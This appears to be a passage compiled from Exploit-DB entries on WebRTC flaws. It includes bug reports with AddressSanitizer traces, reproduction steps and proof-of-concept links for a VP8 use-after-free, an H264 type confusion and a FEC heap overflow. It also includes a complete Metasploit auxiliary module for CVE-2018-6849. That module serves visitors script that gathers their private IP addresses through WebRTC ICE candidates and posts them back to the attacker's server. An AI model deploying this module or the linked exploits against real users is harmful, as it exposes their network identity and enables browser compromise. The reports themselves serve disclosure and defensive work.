Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==20098==ABORTING
To reproduce this issue:
1) replace video/replay.cc with the attached version, and build it with asan (ninja -C out/asan video_replay). Note that this file adds the ability to load a full receiver config to the video replay tool, I'm hoping to eventually get this change committed to WebRTC.
2) Download the attached files config3.txt and heapuaf
3) run video_replay --input_file heapuaf --config_file config3.txt
This issue affects any browser that supports VP8, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP8, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45121.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",
'Description' => %q(
This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.
),
'License' => MSF_LICENSE,
'Author' => [
'Brendan Coles', #MSF Module
'Dhiraj Mishra' #MSF Module
],
'References' => [
[ 'CVE', '2018-6849' ],
['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
],
'DisclosureDate' => 'Jan 26 2018',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
# code from: https://github.com/diafygi/webrtc-ips
@html = <<-JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
getIPs(function(ip){
//console.log(ip);
var xmlhttp = new XMLHttpRequest;
xmlhttp.open('POST', window.location, true);
xmlhttp.send(ip);
});
</script>
JS
end
def on_request_uri(cli, request)
case request.method.downcase
when 'get'
print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
send_response(cli, @html)
when 'post'
print_status("#{cli.peerhost}: Received reply:")
puts request.to_s
else
print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
end
end
end
Type confusion can occur when processing a H264 packet. In the method PacketBuffer::FindFrames in modules/video_coding/packet_buffer.cc there is a loop on line 296 that goes through the data_buffer_ vector backwards. The flag is_h264 is set before this loop, and if it is true, the loop extracts and sets h264 struct specific data in each packet of the buffer. This flag is not updated for each packet. So if a number of non-h264 packets are followed by a h264 packet, a VP8 or VP9 packet can be treated at a h264 check, allowing several bounds checks to be bypassed.
1) unzip the attached webrtc-from-chat2.zip on a local webserver
2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace pc/srtptransport.cc and third_party/libsrtp/crypto/cipher/cipher.c with the version attached to the issue
3) build webrtc, including the examples
4) run the attached webrtcserver.py with python 3.6 or higher
5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to
6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome
7) Enter any username and hit "Log in"
8) Type anything into the chat window at the bottom and hit send
Though the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.
This issue affects any browser that supports H264, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support H264, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.
Please note it is not sufficient to fix this issue in Chrome, it needs to be upstreamed to webrtc, so all users of the library can get the fix.
Adding stack trace:
#0 0x55bd530e0721 in webrtc::video_coding::PacketBuffer::FindFrames(unsigned short) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/video_coding/packet_buffer.cc:314:33
#1 0x55bd530dcb24 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/video_coding/packet_buffer.cc:126:20
#2 0x55bd530d0592 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:242:19
#3 0x55bd52f225ed in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#4 0x55bd52f16fbd in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/rtp_rtcp/source/rtp_receiver_impl.cc:192:42
#5 0x55bd530d144f in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:410:20
#6 0x55bd530d1142 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:256:3
#7 0x55bd530f8098 in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:239:35
#8 0x55bd530d3fa9 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:430:23
#9 0x55bd530d134b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:401:5
#10 0x55bd530d1fc2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/video/rtp_video_stream_receiver.cc:301:3
#11 0x55bd40d97311 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/rtp_demuxer.cc:157:11
#12 0x55bd40d9c1a1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19
#13 0x55bd52e3fe39 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/call.cc:1292:36
#14 0x55bd52e407e3 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/call/call.cc:1316:10
#15 0x55bd5358b001 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/media/engine/webrtcvideoengine.cc:1444:26
#16 0x55bd52deb9e2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/pc/channel.cc:0:21
#17 0x55bd52e09370 in rtc::AsyncInvoker::OnMessage(rtc::Message*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../third_party/webrtc/rtc_base/asyncinvoker.cc:45:22
#18 0x55bd52ca1711 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../jingle/glue/thread_wrapper.cc:157:22
#19 0x55bd52ca29ee in jingle_glue::JingleThreadWrapper::RunTask(int) /usr/local/google/home/natashenka/chromium/src/out/asan/../../jingle/glue/thread_wrapper.cc:279:7
#20 0x55bd447abaf5 in Run /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/callback.h:96:12
#21 0x55bd447abaf5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/debug/task_annotator.cc:101:0
#22 0x55bd44809665 in base::MessageLoop::RunTask(base::PendingTask*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_loop.cc:319:25
#23 0x55bd4480a8d4 in DeferOrRunPendingTask /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_loop.cc:329:5
#24 0x55bd4480a8d4 in base::MessageLoop::DoWork() /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_loop.cc:373:0
#25 0x55bd44812bff in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/message_loop/message_pump_default.cc:37:31
#26 0x55bd4487fdb1 in base::RunLoop::Run() /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/run_loop.cc:131:14
#27 0x55bd448ff6c4 in base::Thread::ThreadMain() /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/threading/thread.cc:337:3
#28 0x55bd449ccaa4 in base::(anonymous namespace)::ThreadFunc(void*) /usr/local/google/home/natashenka/chromium/src/out/asan/../../base/threading/platform_thread_posix.cc:76:13
#29 0x7fedd89fa493 in start_thread ??:0:0
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45123.zip
There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incoming_rtp_packet, which is an RTP packet with a mac length that is defined by the transport (2048 bytes for DTLS in Chrome). This packet is then copied to the received_packet in several locations in the method, depending on packet properties, using the lenth of the incoming_rtp_packet as the copy length. The received_packet is a ForwardErrorCorrection::ReceivedPacket, which has a max size of 1500. Therefore, the memcpy calls in this method can overflow this buffer.
==204614==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b000046670 at pc 0x00000059d958 bp 0x7ffcac5716f0 sp 0x7ffcac570ea0
WRITE of size 2316 at 0x61b000046670 thread T0
#0 0x59d957 in __asan_memcpy /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
#1 0x1b6aacc in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:173:5
#2 0x1b3cd5c in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:426:27
#3 0x1b39a31 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:402:5
#4 0x1b3a895 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:301:3
#5 0x8c7a26 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#6 0x8cec3d in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#7 0x12e8507 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1291:36
#8 0x12e92a0 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1316:10
#9 0x5da2a6 in webrtc::RtpReplay() video/replay.cc:635:31
#10 0x5dd5fe in main video/replay.cc:700:3
#11 0x7feaa1ee92b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
0x61b000046670 is located 0 bytes to the right of 1520-byte region [0x61b000046080,0x61b000046670)
allocated by thread T0 here:
#0 0x5c9362 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3
#1 0x1b6a8c8 in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:165:35
#2 0x1b3cd5c in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:426:27
#3 0x1b39a31 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:402:5
#4 0x1b3a895 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:301:3
#5 0x8c7a26 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#6 0x8cec3d in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#7 0x12e8507 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1291:36
#8 0x12e92a0 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1316:10
#9 0x5da2a6 in webrtc::RtpReplay() video/replay.cc:635:31
#10 0x5dd5fe in main video/replay.cc:700:3
#11 0x7feaa1ee92b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c3680000c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680000cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3680000cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa
0x0c3680000cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680000d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
To reproduce this issue:
1) replace video/replay.cc with the attached version, and build it with asan (ninja -C out/asan video_replay). Note that this file adds the ability to load a full receiver config to the video replay tool, I'm hoping to eventually get this change committed to WebRTC.
2) Download the attached files config4.txt and fallbackoob1
3) run video_replay --input_file fallbackoob1 --config_file config4.txt
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45122.zip